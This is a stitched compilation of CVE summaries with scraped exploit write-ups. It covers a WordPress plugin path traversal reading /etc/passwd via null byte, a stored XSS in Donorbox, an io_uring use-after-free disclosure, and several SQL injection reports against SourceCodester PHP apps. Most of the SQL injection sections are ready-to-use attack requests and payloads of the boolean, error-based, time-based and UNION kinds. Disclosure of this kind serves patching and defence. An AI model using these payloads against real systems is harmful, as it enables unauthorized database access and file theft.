The Admin Word Count Column WordPress plugin through 2.2 does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique

    # Exploit Title: WordPress Plugin admin-word-count-column 2.2 - LocalFile Download# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/# Date: 27-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage:https://wordpress.org/plugins/admin-word-count-column/<https://wordpress.org/plugins/video-synchro-pdf/># Version: 2.2# Contact me: h [at] spidersilk.com# PHP version: 5.3.2 or below# Vulnerable File: plugins/admin-word-count-column/download-csv.php# Vulnerable Code:```<?phpdate_default_timezone_set('America/Los_Angeles');$csvdate = date('Md-H-i-s-T');$csvname = 'wordcounts-' . $csvdate . '.csv';header('Content-Type: application/csv');header('Content-Disposition: attachment; filename=' . $csvname);header('Pragma: no-cache');readfile($_GET['path'] . 'cpwc.csv');?>```# Proof of Concept:localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0Note: Null byte injection will only working in php 5.3.2 and below 5.3.2.

CVE-2022-1390: WordPress Admin Word Count Column 2.2 Local File Inclusion ≈ Packet Storm

The Donorbox WordPress plugin before 7.1.7 does not sanitise and escape its Campaign URL settings before outputting it in an attribute, leading to a Stored Cross-Site Scripting issue even when the unfiltered_html capability is disallowed

    # Exploit Title: WordPress Plugin donorbox-donation-form 7.1.6 -Stored Cross Site Scripting (Authenticated)# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage:https://wordpress.org/plugins/donorbox-donation-form<https://wordpress.org/plugins/amministrazione-aperta/># Version: 7.1.6# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable Code:```public function donorbox_embed_campaign_id_settings() { ?>        <inputname="donorbox_embed_campaign_options[donorbox_embed_campaign_id]"type="text" value="<?php echo $this->options['donorbox_embed_campaign_id'];?>" class="regular-text" />        <?php    }```# POC1) Install donorbox-donation-form<https://wordpress.org/plugins/amministrazione-aperta/> WordPress plugin2)Open donorbox plugin settings3) Inject payload in URL field4) XSS will trigger.# Timeline21/03/2022 - Vendor notified24/03/2022 - Fix / patch24/03/2022 - CVE Requested29/03/2022 - Public disclosure

CVE-2022-1396: WordPress Donorbox-Donation-Form 7.1.6 Cross Site Scripting ≈ Packet Storm

In Terramaster F4-210, F2-210 TOS 4.2.X (4.2.15-2107141517), an attacker can self-sign session cookies by knowing the target's MAC address and the user's password hash. Guest users (disabled by default) can be abused using a null/empty hash and allow an unauthenticated attacker to login as guest.

CVE-2021-45841: How to summon RCEs

In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 22 Apr 2022 02:43:27 +0200
From: David Bouman <dbouman03@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux: UaF due to concurrency issue in io\_uring timeouts

Hello list,

We (Jayden Rivers and David Bouman) are disclosing a bug we found in the 
Linux kernel's io\_uring subsystem. We have written a local privilege 
escalation PoC that can successfully elevate to system root from an 
unprivileged process (in a container). We will be releasing a blog post 
(including exploit code) in a week or two. It should be noted that 
unlike many Linux vulnerabilities that have surfaced recently, 
triggering this one does not require an attacker to have any kind of 
privileges (e.g. in a user namespace). This leaves many systems vulnerable.

We are still looking for a CNA representative that can assign a CVE 
number for this vulnerability; please contact us!

Kernel versions 5.10+ are affected, and linux-stable patches are already 
pushed. The upstream patch commit is 
e677edbcabee849bfdd43f1602bccbecf736a646 ("io\_uring: fix race between 
timeout flush and removal").

When the IORING\_OP\_TIMEOUT (T) and IORING\_OP\_LINK\_TIMEOUT (LT) opcodes 
are combined in a linked submission queue entry, and another request (B) 
finishes, a race might occur: namely, when due to the completion of B, T 
is cancelled (through the completion event count), and LT is canceled by 
its hrtimer at the same time. Whilst T is still being cleaned up, LT is 
already freed by a different execution context, and since they are 
linked, the cleanup of T retains a dangling reference to the now-freed 
LT. Hence, there's a use-after-free.

Exploitation-wise, the attacker can reallocate LT to another \`struct 
io\_kiocb\` and defer the UaF to e.g. a \`struct file\` (this is the 
technique we will describe in aforementioned blog post).

The race window is quite tight and the scenario is complicated, so the 
race can only be won very infrequently in our experience.

It is advised to upgrade your kernel to latest ASAP.

Greetings,

Jayden Rivers & David Bouman

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-29582: security - Linux: UaF due to concurrency issue in io_uring timeouts

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=edit.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=edit

Vulnerability location: /BabyCare/admin.php?id=posts&action=edit&postid=2 //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=edit&postid=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=edit&postid\=2%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=posts&action\=edit&postid\=2' AND 7502=7502 AND 'Yurq'\='Yurq

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 6867 FROM(SELECT COUNT(\*),CONCAT(0x7162786a71,(SELECT (ELT(6867=6867,1))),0x7170767071,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'huoz'\='huoz

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=edit&postid\=2' AND (SELECT 5804 FROM (SELECT(SLEEP(5)))ZBUN) AND 'nxGO'\='nxGO

    Type: UNION query
    Title: Generic UNION query (NULL) \- 8 columns
    Payload: id\=posts&action\=edit&postid\=\-9180' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162786a71,0x4e436b74735063624a4164484d4f675676736e68467951525141677146614f56476b524f66456f50,0x7170767071),NULL,NULL,NULL,NULL-- -
\---

CVE-2022-28422: bug_report/SQLi-3.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via BabyCare/admin.php?id=theme&setid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/theme.php

Vulnerability location: BabyCare/admin.php?id=theme&setid= //setid is Injection point

\[+\]Payload: setid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+ //setid is Injection point

GET /BabyCare/admin.php?id\=theme&setid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: setid (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: id\=theme&setid\=1' AND 4666=4666 AND 'rScZ'\='rScZ

    Type: error\-based
    Title: MySQL \>= 5.0 AND error\-based \- WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id\=theme&setid\=1' AND (SELECT 1518 FROM(SELECT COUNT(\*),CONCAT(0x7171707671,(SELECT (ELT(1518=1518,1))),0x7176717671,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a) AND 'KBjM'\='KBjM

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=theme&setid\=1' AND (SELECT 8964 FROM (SELECT(SLEEP(5)))SZjt) AND 'pISR'\='pISR
\--\-

CVE-2022-28420: bug_report/SQLi-1.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin.php?id=posts&action=display&value=1&postid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/post.php 

Vulnerability location: /BabyCare/admin.php?id=posts&action=display&value=1&postid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=display&value=1&postid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=display&value\=1&postid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=7r2orfo1e9b49mg28f5ke9bdjv
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=display&value\=1&postid\=1' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 1 ELSE 0x28 END))-- GiVX
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&action=display&value=1&postid=1' AND (SELECT 7280 FROM(SELECT COUNT(\*),CONCAT(0x71627a7071,(SELECT (ELT(7280\=7280,1))),0x71787a6a71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- PXXk

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=display&value\=1&postid\=1' AND (SELECT 3574 FROM (SELECT(SLEEP(5)))SpIf)-- qCfa
\---

CVE-2022-28421: bug_report/SQLi-2.md at main · k0xx11/bug_report

Simple Real Estate Portal System v1.0 was discovered to contain a SQL injection vulnerability via /reps/admin/?page=agents/manage_agent.

**Simple Real Estate Portal System v1.0 has a SQL injection vulnerability**

vendors: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html

Vulnerability file: /reps/admin/?page=agents/manage\_agent&id=

Vulnerability location: /reps/admin/?page=agents/manage\_agent&id= , id

\[+\] Payload: /reps/admin/?page=agents/manage\_agent&id=-6193%27%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,CONCAT(0x71767a6b71,0x7771447369794d5759634665645151594641457976797a594e4572717a514845527a5456534d416b,0x7176787871),9,10,11,12,13,14--+ //id is Injection point

    GET /reps/admin/?page=agents/manage_agent&id=-6193%27%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,CONCAT(0x71767a6b71,0x7771447369794d5759634665645151594641457976797a594e4572717a514845527a5456534d416b,0x7176787871),9,10,11,12,13,14--+- HTTP/1.1
    Host: 192.168.1.19
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=b7n0d4rju88m3p50kmalnvn6ti
    Connection: close
    
    //id is Injection point
    

\--\-
Parameter: id (GET)
    Type: boolean\-based blind
    Title: AND boolean\-based blind \- WHERE or HAVING clause
    Payload: page\=agents/manage\_agent&id\=1' AND 9572=9572 AND 'Lnjk'\='Lnjk

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: page\=agents/manage\_agent&id\=1' AND (SELECT 2188 FROM (SELECT(SLEEP(5)))fVBu) AND 'ffQM'\='ffQM

    Type: UNION query
    Title: Generic UNION query (NULL) \- 14 columns
    Payload: page\=agents/manage\_agent&id\=\-1480' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a6a6b71,0x6a49765a49784c4b45514e6d766369555a78597a6a6267764d5653626e7076744250516f59764b66,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
\---

CVE-2022-28411: bug_report/SQLi-5.md at main · k0xx11/bug_report

Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.

Permalink

Cannot retrieve contributors at this time

**Purchase-order-management-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability File: \\purchase\_order\\classes\\Master.php?f=delete\_item

Vulnerability location: /purchase\_order/classes/Master.php?f=delete\_item, id

\[+\] Payload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

POST /purchase\_order/classes/Master.php?f\=delete\_item HTTP/1.1
Host: 192.168.1.19
Content\-Length: 65
Accept: application/json, text/javascript, \*/\*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.19
Referer: http://192.168.1.19/purchase\_order/admin/?page=items
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sils4jibq9sp4e2n7i4joq8to7
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

CVE-2022-28022: bug_report/SQLi-1.md at main · k0xx11/bug_report

Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via /hocms/classes/Master.php?f=delete_member.

Permalink

Cannot retrieve contributors at this time

**Home Owners Collection Management System has SQL injection vulnerability**

vendor : https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html

Vulnerability file: /hocms/classes/Master.php?f=delete\_member

Vulnerability location: /hocms/classes/Master.php?f=delete\_member,id

\[+\]Payload: id=2' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point

    POST /hocms/classes/Master.php?f=delete_member HTTP/1.1
    Host: 192.168.1.19
    Content-Length: 64
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.1.19
    Referer: http://192.168.1.19/hocms/admin/?page=members
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=vfe306mj2a11p5q94440ttg4bd
    Connection: close
    
    id=2' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+ //id is Injection point
    

\--\-
Parameter: id (POST)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=2' RLIKE (SELECT (CASE WHEN (9537=9537) THEN 2 ELSE 0x28 END))-- lLzj
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2' AND (SELECT 2052 FROM(SELECT COUNT(\*),CONCAT(0x7162716b71,(SELECT (ELT(2052\=2052,1))),0x717a627a71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- kJBi

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=2' AND (SELECT 8581 FROM (SELECT(SLEEP(5)))WkHC)-- dgcN
\---

Tag

#php